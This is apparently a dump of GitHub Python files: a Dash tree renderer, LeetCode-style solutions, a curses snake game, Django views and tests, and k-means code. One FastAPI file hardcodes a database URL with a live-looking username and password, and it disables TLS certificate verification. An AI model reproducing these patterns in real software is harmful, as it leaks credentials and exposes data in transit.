rel_path)\n","repo_name":"CN-UPB/upb-son-editor-backend","sub_path":"src/son_editor/impl/projectsimpl.py","file_name":"projectsimpl.py","file_ext":"py","file_size_in_byte":7383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"74067500689","text":"import dash_html_components as html\nfrom dash_html_components import Strong, Em\nimport json\n\ndef dict_to_collapsible(input_object):\n content_list = []\n if isinstance(input_object,list):\n for item in input_object:\n content_list.append(extract_layer(item))\n elif isinstance(input_object,dict):\n return extract_layer(input_object)\n else:\n try:\n string_value = str(input_object)\n except:\n string_value = \"!ERROR! 
- Non-dict object could not become String\" +\\\n \" - Type = {}\".format(type(input_object))\n content_list = [html.P(string_value)]\n\n html_div = html.Div(content_list)\n return html_div\n\n\ndef extract_layer(input_object,indents=0):\n indent_text = str(2*indents) + \"em\"\n open_on_default = True\n\n if isinstance(input_object,list):\n # Transform to dict and then continue\n input_object = dict(enumerate(input_object))\n open_on_default = False\n\n if isinstance(input_object,dict):\n content_list = []\n for key,value in input_object.items():\n if isinstance(value,dict) or isinstance(value,list):\n content_list.append(\n html.Details([\n html.Summary(Em(Strong(str(key)))),\n extract_layer(value,indents+1)\n ],open=open_on_default)\n )\n else:\n try:\n string_value = [Strong(str(key)),\": {}\".format(value)]\n except:\n string_value = \"!ERROR! - Non-dict object could not \" +\\\n \"become String - Type = {}\".format(type(input_object))\n\n content_list.append( html.P(string_value) )\n else:\n # ERROR: Something has gone wrong here. Only Dicts/lists should be passed\n # to this file.\n content_list = [html.P(\"!Error! Not list or dict: {}\".format(\\\n type(input_object)))]\n\n html_div = html.Div(content_list,style={'text-indent':indent_text})\n return html_div\n\ntest_dict = {\n \"outer_layer1\": {\n \"middle_layer1.1\": {\n \"inner_layer1.1.1\": \"inner_value1.1.1\",\n \"inner_layer1.1.2\": \"inner_value1.1.2\"\n },\n \"middle_layer1.2\": \"middle_value1.2\",\n \"middle_layer1.3\": [\n \"list_value1\",\n \"list_value2\",\n \"list_value3\",\n {\n \"dict_in_list1\": \"value1.3.1\",\n \"dict_in_list2\": {\n \"some_key\": \"help\"\n }\n }\n ]\n }\n}\n\n################################################################################\n\nif __name__ == \"__main__\":\n print(extract_layer(test_dict))\n","repo_name":"elliott-fogg/lco_schedule_visualiser","sub_path":"collapsible.py","file_name":"collapsible.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24805807093","text":"#!/usr/bin/python\n# Strings 2.1.opt O(s)\n# defaultdict builds a dictionary (in this case) where the key is the char in the string and the val is an int.\n\nfrom collections import defaultdict\n\ndef del_if_zero(dict, char): #\n\tif dict[char] == 0:\n\t\tdel dict[char]\n\ndef anagram_indices(word, s):\n\tresult = []\n\n\tfreq = defaultdict(int)\n\tfor char in word: \n\t\tfreq[char] += 1\n\t\t#print(\"freq = \", freq) # freq = {'a':1, 'b':1}\n\n\tfor char in s[:len(word)]: # for char in s[:2]\n\t\tfreq[char] -= 1\n\t\tdel_if_zero(freq, char)\n\t\t#print('freq after del_if_zero', freq) # freq = {}\n\n\tif not freq: # if the 2 above for loops produce nothing then the first characters of the string are ana anagram\n\t\t\t\t# The first index (0) is appended to result\n\t\tresult.append(0)\n\n\tfor i in range(len(word), len(s)): # for i in range(2, 6) - does the same as above but starts after len(word)\n\t\tstart_char, end_char = s[i - len(word)], s[i] # start_char is 'a' (2 - 2) end_char is 'x' (word window vars)\n\t\tprint('i = ', i)\n\t\t#print('len(word = ', len(word))\n\t\tprint('start_char = ', start_char)\n\t\tprint('end_char = ', end_char)\n\t\tfreq[start_char] += 1\n\t\tprint('freq 2 build up', freq)\n\t\tdel_if_zero(freq, start_char)\n\t\tprint('freq after del_if', freq)\n\n\t\tfreq[end_char] -= 1\n\t\tdel_if_zero(freq, end_char)\n\n\t\tif not freq:\n\t\t\tbeginning_index = i - len(word) + 
1\n\t\t\tresult.append(beginning_index)\n\tprint(result)\n\treturn result\n\nif __name__ == \"__main__\":\n\tg = anagram_indices('ab', 'abxaba')\n\tprint(g)\n\n","repo_name":"anovacap/daily_coding_problem","sub_path":"is_anagram_opt.py","file_name":"is_anagram_opt.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70020200531","text":"#Import modules\nimport random\nimport curses\n\n#Initialize the curses library to create our screen\nscreen = curses.initscr()\n\n#Hide the mouse cursor\ncurses.curs_set(0)\n\n#Getmax screen height and width\nscreen_height, screen_width = screen.getmaxyx()\n\n#Create a new window for the game\nwindow = curses.newwin(screen_height, screen_width, 0, 0)\n\n#Allow window to receive input from the keyboard\nwindow.keypad(1) # == Accept input for the keyboard\n\n#Set the delay for updating the screen\nwindow.timeout(200) #100ms\n\n#Set the x,y coordinates of the initial position of snake's head\nsnk_x = screen_width // 4\nsnk_y = screen_height // 2\n\n#Define the initial position of the snake body\nsnake = [[snk_y, snk_x], [snk_y, snk_x - 1], [snk_y, snk_x - 2]]\n\n#Create the food in the middle of window\nfood = [screen_height // 2, screen_width // 2]\n\n#Add the food by using PI character from curses module\nwindow.addch(food[0], food[1], curses.ACS_DIAMOND)\n\n#Set initial movement direction to right\nkey = curses.KEY_RIGHT\n\n#Create game loop that loops forever until player loses or quits\n##THE MAIN GAME LOOP\nwhile True:\n\n #get the next key that will be pressed by user\n next_key = window.getch()\n\n #If user doesn't input anything, key remains same, else key will be set to time new pressed key\n key = key if next_key == -1 else next_key #-1 means the user didn't enter anything.\n\n #Check if snake collided with the walls or itself\n #If it collides, close the window & exit program\n if snake[0][0] in [0, screen_height] or snake[0][1] in [\n 0, screen_width\n ] or snake[0] in snake[1:]:\n curses.endwin() #closing the window\n quit() #exit the program\n\n #Set the new position of the snake head based on the direction\n new_head = [snake[0][0], snake[0][1]]\n if key == curses.KEY_DOWN:\n new_head[0] += 1\n if key == curses.KEY_UP:\n new_head[0] -= 1\n if key == curses.KEY_RIGHT:\n new_head[1] += 1\n if key == curses.KEY_LEFT:\n new_head[1] -= 1\n\n #Insert the new head to the first position of snake list\n snake.insert(0, new_head)\n\n #Check if snake ate the food\n if snake[0] == food:\n\n #Remove food if snake at it\n food = None\n #While food is removed, generate new food in a random place on screen with\n while food is None:\n new_food = [\n random.randint(1, screen_height - 1),\n random.randint(1, screen_width - 1)\n ]\n #Set the food to new food if new food generated is not in snake body and add it to screen\n\n food = new_food if new_food not in snake else None\n window.addch(food[0], food[1], curses.ACS_DIAMOND)\n\n #Otherwise, remove the last segment of snake body (If snake didn't eat the food)\n else:\n tail = snake.pop()\n window.addch(tail[0], tail[1], ' ')\n\n #Update the position of the snake on the screen\n window.addch(snake[0][0], snake[0][1], curses.ACS_CKBOARD)\n","repo_name":"NourSoltani/SnakeGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28411596069","text":"import logging\nimport 
os\nimport sys\nimport zipfile\n\nimport wget\n\nlogger = logging.getLogger('sirendownloadlogging')\n\n# Définition du logging level\nlogger.setLevel(logging.INFO)\nhandler = logging.StreamHandler(stream=sys.stdout)\nlogger.addHandler(handler)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef download_file_sirene(path_root, filename_sirene):\n \"\"\"download associated file \n \"\"\"\n try:\n # download zip file\n url = f'https://files.data.gouv.fr/insee-sirene/Stock{filename_sirene}_utf8.zip'\n filename_zip = f'Stock{filename_sirene}_utf8.zip'\n filename_csv = f'Stock{filename_sirene}_utf8.csv'\n wget.download(url, os.path.join(path_root, filename_zip))\n\n # extract csv file\n with zipfile.ZipFile(os.path.join(path_root, filename_zip), 'r') as zip:\n zip.extract(filename_csv, path_root)\n os.remove(os.path.join(path_root, filename_zip))\n\n except Exception as e:\n logging.error('Récupération de la base siren : %s', str(e))\n","repo_name":"r-jaylet/OpenDataWrangler","sub_path":"utils/utils_sirene.py","file_name":"utils_sirene.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35117860221","text":"import db.query_db as db\n\n\nclass AnswerQuestion:\n id:int\n answer_id:int\n question_id:int\n\n def __init__(self, **kwargs):\n self.id = kwargs['id']\n self.answer_id = kwargs['answer_id']\n self.question_id = kwargs['question_id']\n\n\n\ndef add_answer_question(answer_id, question_id):\n try:\n max_id = get_max_id() + 1\n print(answer_id, question_id)\n db.query=f\"\"\"insert into AnswerQuestion (id, AnswerId, QuestionId)\n values ({max_id}, {answer_id}, {question_id})\"\"\"\n result = db.pool.retry_operation_sync(db.execute_query)\n return max_id\n except Exception as exc:\n print(exc)\n return False\n\n\ndef get_answer_question_by_vote_answer_id(vote_answer_id):\n try:\n db.query = f\"\"\"select * \n from AnswerQuestion\n where AnswerId = {vote_answer_id}\"\"\"\n result = db.pool.retry_operation_sync(db.execute_query)\n answer_questions = []\n for row in result[0].rows:\n answer_question = AnswerQuestion(id= row.id, answer_id=row.AnswerId, question_id=row.QuestionId)\n answer_questions.append(answer_question)\n return answer_questions\n except Exception as exp:\n print(exp)\n return False\n\ndef get_max_id():\n db.query = f\"\"\"select max(id) as id from AnswerQuestion\"\"\"\n result = db.pool.retry_operation_sync(db.execute_query)\n if result[0].rows[0].id == None:\n return 0\n return result[0].rows[0].id","repo_name":"DimaHovrov/KuratorBot","sub_path":"model/VoteModels/AnswerQuestion.py","file_name":"AnswerQuestion.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25998862511","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nlongest_valid_parentheses.py\n\nCreated by Shengwei on 2014-07-08.\n\"\"\"\n\n# https://oj.leetcode.com/problems/longest-valid-parentheses/\n# tags: medium / hard, array, parentheses, stack, longest\n\n\"\"\"\nGiven a string containing just the characters '(' and ')', find the length of the longest valid (well-formed) parentheses substring.\n\nFor \"(()\", the longest valid parentheses substring is \"()\", which has length = 2.\n\nAnother example is \")()())\", where the longest valid parentheses substring is \"()()\", which has length = 4.\n\"\"\"\n\n# alternative: D&C\n\nclass Solution:\n # @param s, a string\n # @return an integer\n def 
longestValidParentheses(self, s):\n stack = []\n \n # for '(' at given index, store the length of matching pair ')';\n # the last one length[len(s)] is a sentinel\n lengths = [0] * (len(s) + 1)\n \n for i in xrange(len(s)):\n if s[i] == '(':\n stack.append(i)\n if s[i] == ')':\n if stack:\n left_index = stack.pop()\n lengths[left_index] = i + 1 - left_index\n \n max_length = current_length = i = 0\n while i < len(s):\n current_length = lengths[i]\n \n # for the last pair, i + current_length == len(s), and\n # it takes advantage of the sentinel\n while lengths[i + current_length] > 0:\n current_length += lengths[i + current_length]\n \n max_length = max(max_length, current_length)\n i += current_length + 1\n \n return max_length\n","repo_name":"CodingVault/LeetCodeInPython","sub_path":"longest_valid_parentheses.py","file_name":"longest_valid_parentheses.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"66"} +{"seq_id":"3331666135","text":"from django.urls import path\nfrom .views import (index,\n register,\n user_login,\n user_logout,\n profile,\n search_user,\n profile_update,\n password_change,\n friend_list,\n friend_requests_list,)\n\nfrom .apis import (FriendList,\n SendFriendRequest,\n UserSearchList,\n CancelFriendRequest,\n AcceptFriendRequest,\n DeclineFriendRequest,\n RemoveFriend,\n CreatePost,\n UserPostList,\n UserDetail)\n\nurlpatterns = [\n # views\n path('', index, name='index'),\n path('register/', register, name='register'),\n path('login/', user_login, name='login'),\n path('logout/', user_logout, name='logout'),\n path('search/', search_user, name='search'),\n path('user//', profile, name='profile'),\n path('user//friends/', friend_list, name='friend_list'),\n path('account/password_change/', password_change, name='password_change'),\n path('account/update/', profile_update, name='profile_update'),\n path('account/friend_requests/', friend_requests_list, name='friend_requests'),\n\n # apis\n path('api/friend_request/', SendFriendRequest.as_view(),\n name='send_friend_request'),\n path('api/friend_request_cancel', CancelFriendRequest.as_view(),\n name='cancel_friend_request'),\n path('api/friend_request_accept/', AcceptFriendRequest.as_view(),\n name='accept_friend_request'),\n path('api/friend_request_decline/', DeclineFriendRequest.as_view(),\n name='decline_friend_request'),\n path('api/friend_remove/', RemoveFriend.as_view(), name='remove_friend'),\n path('api/post/create/', CreatePost.as_view(), name='create_post'),\n path('api/user//posts/',\n UserPostList.as_view(), name='user_posts'),\n\n ###### NOT USED #########\n path('api/user//friends/',\n FriendList.as_view(), name='friend_list_api'),\n path('api/user//', UserDetail.as_view(), name='user_detail'),\n path('api/search/', UserSearchList.as_view(), name='user_search_list'),\n]\n","repo_name":"sinhaugoh/FriendZone","sub_path":"social_media/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33388860105","text":"import os\nimport random\n\nif True:\n music_folder = 'C:\\\\Users\\\\Hunter\\\\Music'\n music = ['Eminem_-_Kamikaze_(Lyrics)','01-Linkin_Park-Wake','02-Linkin_Park-Given_Up']\n random_music = music_folder + random.choice(music) + '.mp3'\n os.system('')\n print(\"enjoy music\")\n\nelse:\n print(\"not play music\")\n\n","repo_name":"MyHackInfo/My-Project","sub_path":"Play 
Songs.py","file_name":"Play Songs.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29954044758","text":"from typing import List\nimport databases\nimport sqlalchemy\nfrom fastapi import FastAPI, status\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseModel\nimport os\nimport urllib\nfrom dotenv import load_dotenv\nload_dotenv()\nimport ssl\nfrom datetime import datetime\nimport time\n\nctx = ssl.create_default_context(cafile='')\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nhost_server = os.environ.get('host_server')\ndb_server_port = urllib.parse.quote_plus(str(os.environ.get('db_server_port')))\ndatabase_name = os.environ.get('database_name')\ndb_username = urllib.parse.quote_plus(str(os.environ.get('db_username')))\ndb_password = urllib.parse.quote_plus(str(os.environ.get('db_password')))\nssl_mode = urllib.parse.quote_plus(str(os.environ.get('ssl_mode')))\n# DATABASE_URL = 'postgresql://{}:{}@{}:{}/{}?sslmode={}'.format(db_username, db_password, host_server, db_server_port, database_name, ssl_mode)\nDATABASE_URL = 'postgres://hquasadanjovxm:74cbc8adaa3db997056839dea9ba9cf88f1ea76b946c1ff2e45bffc39f182946@ec2-18-211-171-122.compute-1.amazonaws.com:5432/de96010mpiergn?sslmode=disable'\n\ndatabase = databases.Database(DATABASE_URL, ssl=ctx)\n\nmetadata = sqlalchemy.MetaData()\n\nnotes = sqlalchemy.Table(\n \"postdemo\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.Integer, primary_key=True),\n sqlalchemy.Column(\"uuid\", sqlalchemy.String),\n sqlalchemy.Column(\"description\", sqlalchemy.String),\n sqlalchemy.Column('username', sqlalchemy.String(16), nullable=False),\n sqlalchemy.Column('imageurl', sqlalchemy.String()),\n sqlalchemy.Column(\"nlike\", sqlalchemy.Integer),\n sqlalchemy.Column(\"ncomment\", sqlalchemy.Integer),\n sqlalchemy.Column(\"commentid\", sqlalchemy.String),\n sqlalchemy.Column(\"datetimenow\", sqlalchemy.String),\n)\n\nengine = sqlalchemy.create_engine(\n 'postgres://hquasadanjovxm:74cbc8adaa3db997056839dea9ba9cf88f1ea76b946c1ff2e45bffc39f182946@ec2-18-211-171-122.compute-1.amazonaws.com:5432/de96010mpiergn', pool_size=3, max_overflow=0,\n)\nmetadata.create_all(engine)\n\n\n\nclass Post(BaseModel):\n id: int\n uuid: str\n description: str\n username: str\n imageurl: str\n nlike: int\n ncomment: int\n commentid: str\n datetimenow: str\n\n\nclass PostIn(BaseModel):\n uuid: str\n description: str\n username: str\n imageurl: str\n nlike: int\n ncomment: int\n commentid: str\n\n\n \n\n\napp = FastAPI(title=\"REST API using FastAPI PostgreSQL Async EndPoints\")\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n\n@app.get(\"/\")\nasync def read_main():\n return {\"msg\": \"yes\"}\n\n@app.get(\"/posts/\", response_model=List[Post], status_code = status.HTTP_200_OK)\nasync def read_notes(page_no: int = 0):\n query = notes.select().offset(page_no*10).limit(10)\n return await database.fetch_all(query)\n\n\n@app.post(\"/posts/\", response_model=PostIn, status_code = status.HTTP_201_CREATED)\nasync def create_note(note: PostIn):\n query = notes.insert().values(\n uuid=note.uuid,\n description=note.description,\n username=note.username,\n imageurl=note.imageurl,\n 
nlike=note.nlike,\n        ncomment=note.ncomment,\n        commentid=note.commentid,\n        datetimenow=str(time.time()),\n    )\n    last_record_id = await database.execute(query)\n    return {**note.dict(), \"id\": last_record_id}\n\n\n# @app.get(\"/notes/{note_id}/\", response_model=Note, status_code = status.HTTP_200_OK)\n# async def read_notes(note_id: int):\n#     query = notes.select().where(notes.c.id == note_id)\n#     return await database.fetch_one(query)\n\n\n# @app.put(\"/notes/{note_id}/\", response_model=Note, status_code = status.HTTP_200_OK)\n# async def update_note(note_id: int, payload: NoteIn):\n#     query = notes.update().where(notes.c.id == note_id).values(text=payload.text, completed=payload.completed)\n#     await database.execute(query)\n#     return {**payload.dict(), \"id\": note_id}\n\n# @app.delete(\"/notes/{note_id}/\", status_code = status.HTTP_200_OK)\n# async def delete_note(note_id: int):\n#     query = notes.delete().where(notes.c.id == note_id)\n#     await database.execute(query)\n#     return {\"message\": \"Note with id: {} deleted successfully!\".format(note_id)}\n\n ","repo_name":"amantiwari1/fastapi_postrgeSql","sub_path":"postapi.py","file_name":"postapi.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"20064475035","text":"def add(a, b):\n    a += b\n    return a\n\nclass Company:\n    def __init__(self, name, staffs=[]):\n        self.name = name\n        self.staffs = staffs\n    def add(self, staff_name):\n        self.staffs.append(staff_name)\n    def remove(self, staff_name):\n        self.staffs.remove(staff_name)\n\nif __name__ == \"__main__\":\n    a = 1\n    b = 2\n    c = add(a, b)\n    print(\"{},{}\".format(a,b))\n    print(c)\n    '''\n    1,2\n    3\n    '''\n\n    a = [1, 2]\n    b = [3, 4]\n    c = add(a, b)\n    print(\"{},{}\".format(a, b))\n    print(c)\n    '''\n    [1, 2, 3, 4],[3, 4]\n    [1, 2, 3, 4]\n    '''\n\n    a = (1, 2)\n    b = (3, 4)\n    c = add(a, b)\n    print(\"{},{}\".format(a, b))\n    print(c)\n    '''\n    (1, 2),(3, 4)\n    (1, 2, 3, 4)\n    '''\n\n    com1 = Company(\"com1\", [\"bobby1\", \"bobby2\", \"bobby3\"])\n    com1.add(\"bobby4\")\n    com1.remove(\"bobby1\")\n    print(com1.staffs)\n    # ['bobby2', 'bobby3', 'bobby4']\n\n    com2 = Company(\"com2\")\n    com2.add(\"bobby\")\n    print(com2.staffs)\n    # ['bobby']\n\n    com3 = Company(\"com3\")\n    com3.add(\"bobby5\")\n    print(com2.staffs)\n    print(com3.staffs)\n    # ['bobby', 'bobby5']\n    # ['bobby', 'bobby5']\n    print(com2.staffs is com3.staffs)\n\n    # com2 and com3 both use the default list; since a list is a mutable object, com2 and com3 share the same list\n    print(Company.__init__.__defaults__)\n    # (['bobby', 'bobby5'],)\n    # Conclusion: avoid passing a list as a default function argument","repo_name":"Echo002/AdvancePython","sub_path":"chapter06/an_error.py","file_name":"an_error.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73947969809","text":"from django import forms\nfrom django.forms import ModelForm\n\nfrom inoks.models.Brand import Brand\n\n\nclass BrandForm(ModelForm):\n\n    class Meta:\n        model = Brand\n        fields = ('name',)\n        widgets = {\n            'name': forms.TextInput(\n                attrs={'class': 'form-control ', 'placeholder': 'Ürün Markası', 'required': 'required'})\n\n\n        }\n","repo_name":"furkanyalcindag/oxit-b2b","sub_path":"inoks/Forms/BrandForm.py","file_name":"BrandForm.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37499841841","text":"from django.test import TestCase\nfrom unittest.mock import MagicMock, patch\n\nfrom django.http import 
HttpResponseBadRequest\nfrom django.forms.fields import CharField\n\nfrom palautteet.email import EmailService\nfrom palautteet.forms import ContactsForm\nfrom palautteet.views import submit_form\n\n\nclass TestEmail(TestCase):\n def test_message_constructed(self):\n data = dict(foo='bar', fizz='buzz')\n res = EmailService._construct_message(data)\n expected = 'foo:\\nbar\\n\\nfizz:\\nbuzz'\n self.assertEqual(expected, res)\n\n def test_message_empty_fields_discarded(self):\n data = dict(foo='bar', fizz=None)\n res = EmailService._construct_message(data)\n expected = 'foo:\\nbar'\n self.assertEqual(expected, res)\n\n\nclass TestForm(TestCase):\n def test_email_name_at_the_end(self):\n class AContactsForm(ContactsForm):\n myfield = CharField()\n\n instance = AContactsForm()\n self.assertListEqual(['name', 'email'], list(instance.fields.keys())[-2:])\n\n\nclass TestViews(TestCase):\n\n @patch('palautteet.views.render')\n def test_email_gets_sent(self, _):\n form = MagicMock()\n form.is_valid.return_value = True\n request = MagicMock()\n service = MagicMock()\n submit_form(request, form, 'foo', service)\n self.assertTrue(service.send.called)\n\n def test_invalid_form_responses_with_400(self):\n form = MagicMock()\n form.is_valid.return_value = False\n request = MagicMock()\n service = MagicMock()\n res = submit_form(request, form, 'foo', service)\n self.assertIsInstance(res, HttpResponseBadRequest)\n","repo_name":"osakunta/django-sivusto","sub_path":"palautteet/tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72915714129","text":"\"\"\" \n# UGLY NUMBER II\n\nWrite a program to find the n-th ugly number.\n\nUgly numbers are positive numbers whose prime factors only include 2, 3, 5. \n\nExample:\n\nInput: n = 10\nOutput: 12\nExplanation: 1, 2, 3, 4, 5, 6, 8, 9, 10, 12 is the sequence of the first 10 ugly numbers.\nNote: \n\n1 is typically treated as an ugly number.\nn does not exceed 1690. 
\n\"\"\"\n\nclass Solution:\n def nthUglyNumber(self, n: int) -> int:\n \n result = [1] * n\n i2 = 0\n i3 = 0\n i5 = 0\n \n next2 = 2\n next3 = 3\n next5 = 5\n \n for i in range(1, n):\n result[i] = min(next2, next3, next5)\n \n if result[i] == next2:\n i2 += 1\n next2 = result[i2] * 2\n \n if result[i] == next3:\n i3 += 1\n next3 = result[i3] * 3\n \n if result[i] == next5:\n i5 += 1\n next5 = result[i5] * 5\n \n return result[-1]","repo_name":"das-jishu/data-structures-basics-leetcode","sub_path":"Leetcode/medium/ugly-number-II.py","file_name":"ugly-number-II.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"66"} +{"seq_id":"20492053077","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 27 21:35:42 2019\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport numpy as np\r\nfrom center_method import *\r\nfrom line_three import *\r\nfrom distance_method import *\r\n\r\ndef get_cen_sqrt(data):\r\n k = np.shape(data)[0]\r\n cen = np.ones((k, k)) * np.inf\r\n for i in range(k):\r\n for j in range(i + 1, k):\r\n cen[i, j] = np.linalg.norm(data[i, :] - data[j, :]) / 2\r\n for i in range(1, k):\r\n for j in range(0, i ):\r\n cen[i, j] = cen[j, i]\r\n return cen\r\n\r\ndef point_all_center(x, c, b, d = euclidean):\r\n # temp = d(x, c, 1)\r\n temp = np.linalg.norm(x - c, axis = 1)\r\n arg = temp.argsort()\r\n index = arg[0]\r\n low_index = arg[1:b+1]\r\n table = temp[arg[0]]\r\n low = temp[arg[1:b+1]]\r\n return index, (table), (low), low_index\r\ndef point_partial_center(x, c, y, a, d = euclidean):\r\n comb = np.hstack((y, a))\r\n b = np.size(comb)\r\n temp = np.linalg.norm(x - c[comb, :], axis=1)\r\n # temp = np.sqrt(d(x, c[comb, :], 1))\r\n arg = temp.argsort()\r\n index = comb[arg[0]]\r\n low_index = comb[arg[1:b]]\r\n table = temp[arg[0]]\r\n low = temp[arg[1:b]]\r\n return index, table, low, low_index\r\n\r\n\r\ndef drake(data, k, center, max_iteration = 200):\r\n row = np.shape(data)[0]\r\n table = np.zeros((row))#high\r\n index = np.zeros((row), int)\r\n cen_sum = np.zeros(np.shape(center))\r\n cen_num = np.zeros((k))\r\n total = 1\r\n b = int(np.ceil(k/4))\r\n low = np.zeros((row, b))\r\n low_index = np.zeros((row, b), int)\r\n for i in range(row):\r\n index[i], table[i], low[i, :], low_index[i, :] = point_all_center(data[i, :], center, b)\r\n cen_sum[index[i], :] += data[i, :]\r\n cen_num[index[i]] += 1\r\n p = np.zeros(k)\r\n count = row * k\r\n cluster_changed = True\r\n while cluster_changed and total < max_iteration:\r\n for i in range(k):\r\n temp = center[i, :].copy()\r\n # if cen_num[i] == 0:\r\n # print('*' * 10 + 'fail' + '*' * 10)\r\n # return -1, -1\r\n # else:\r\n if cen_num[i] != 0:\r\n center[i, :] = cen_sum[i, :] / cen_num[i]\r\n p[i] = np.linalg.norm(center[i, :] - temp)\r\n first = np.max(p)\r\n cluster_changed = False\r\n # print('这是Drake的第', total, '次迭代')\r\n total += 1\r\n s = get_cen_sqrt(center).min(1)\r\n m = -1\r\n for i in range(row):\r\n table[i] += p[index[i]]\r\n low[i, b - 1] -= first\r\n for z in range(b - 2, -1, -1):\r\n low[i, z] = np.min((low[i, z] - p[low_index[i, z]], low[i, z + 1])) #propagate,\r\n if table[i] > s[index[i]] :\r\n temp = index[i]\r\n flag = True\r\n for z in range(b):\r\n if table[i] <= low[i, z]:\r\n flag = False \r\n if z > 0:\r\n index[i], table[i], low[i, :z], low_index[i, :z] = point_partial_center(data[i, :], center, index[i], low_index[i, :z]) #为何我用z+1就有误差了?\r\n count += z\r\n break\r\n if flag:\r\n index[i], table[i], low[i, :b], 
low_index[i, :b] = point_all_center(data[i, :], center, b)\r\n count += k\r\n if temp != index[i]:\r\n cluster_changed = True\r\n cen_num[temp] -= 1\r\n cen_num[index[i]] += 1\r\n cen_sum[temp, :] -= data[i, :]\r\n cen_sum[index[i], :] += data[i, :]\r\n m = max(m, z+1)\r\n b = max(int(np.ceil(k/8)), m)\r\n table = np.linalg.norm(data - center[index[:], :], axis = 1) ** 2\r\n count += row\r\n print(total)\r\n return index, table, count\r\n\r\nfrom harmerly_triangle import hamerly_sqrt\r\nfrom k_means import naive_k_means\r\nfrom elkan_triangle import elkan_sqrt\r\nimport time\r\nfrom center_method import plus_triangle\r\nfrom box_kdtree import kdtree_kmeans\r\nif __name__ == '__main__':\r\n# data = np.load('iris.npy')\r\n# data = np.load('birch_data.npy')\r\n t =[]\r\n # dim = [2,4,8,16,32,64]\r\n # kk = [2,4,6, 8,12, 16,22, 32,64,128, 256, 512]\r\n # kk = [128, 148, 168, 188, 208, 238, 268, 298,356, 400]\r\n # kk = [12,17,22, 27,32,37]\r\n # kk = [2,3,4,5,6, 7,8,9,10]\r\n # kk = [4,8,16,32,64,128]\r\n # kk = [2,4]\r\n k=3\r\n data = np.random.rand(2000,3)\r\n center=plus_triangle(data, k)\r\n # # a = time.process_time()\r\n ii, jj, c1 = drake(data , k, center.copy())\r\n # # b = time.process_time()\r\n i2, j2 = naive_k_means(data, k, center.copy())\r\n print(np.sum(i2 - ii), np.sum(j2)-np.sum(jj))\r\n\r\n # kk=[160, 200, 256, 512]\r\n\r\n#todo all triangle styles\r\n\r\n# count = []\r\n# for dim in kk:\r\n# data = np.random.rand(6800,dim)\r\n# # k = 13\r\n# print(dim,'维了')\r\n# center=plus_triangle(data, k)\r\n#\r\n# a = time.process_time()\r\n# ii, jj, ch, original = hamerly_sqrt(data, k, center.copy())\r\n# b = time.process_time()\r\n# t.append(b - a)\r\n#\r\n# a = time.process_time()\r\n# i1, j1 = naive_k_means(data, k, center.copy())\r\n# b = time.process_time()\r\n# t.append(b - a)\r\n# print(np.sum(i1 - ii), np.sum(j1) - np.sum(jj))\r\n#\r\n# a = time.process_time()\r\n# i2, j2, ce = elkan_sqrt(data, k, center.copy())\r\n# b = time.process_time()\r\n# t.append(b - a)\r\n# print(np.sum(i2 - ii), np.sum(j2) - np.sum(jj))\r\n#\r\n# a = time.process_time()\r\n# i3, j3, ctree = kdtree_kmeans(data, k, center.copy(), 50)\r\n# b = time.process_time()\r\n# t.append(b - a)\r\n# print(np.sum(np.abs(i3 - ii)), np.sum(j3) - np.sum(jj))\r\n#\r\n# a = time.process_time()\r\n# i4, j4, cd = drake(data , k, center.copy())\r\n# b = time.process_time()\r\n# t.append(b-a)\r\n# print(np.sum(i4 - ii), np.sum(j4) - np.sum(jj))\r\n#\r\n# count.append(ch)\r\n# count.append(original)\r\n# count.append(ce)\r\n# count.append(ctree)\r\n# count.append(cd)\r\n# # kk=dim\r\n# plt.plot(kk, t[2::5], label='Elkan', c='k',linewidth=2)\r\n# plt.plot(kk, t[1::5], '--',label='standard', c='b',linewidth=2)\r\n# plt.plot(kk, t[0::5], 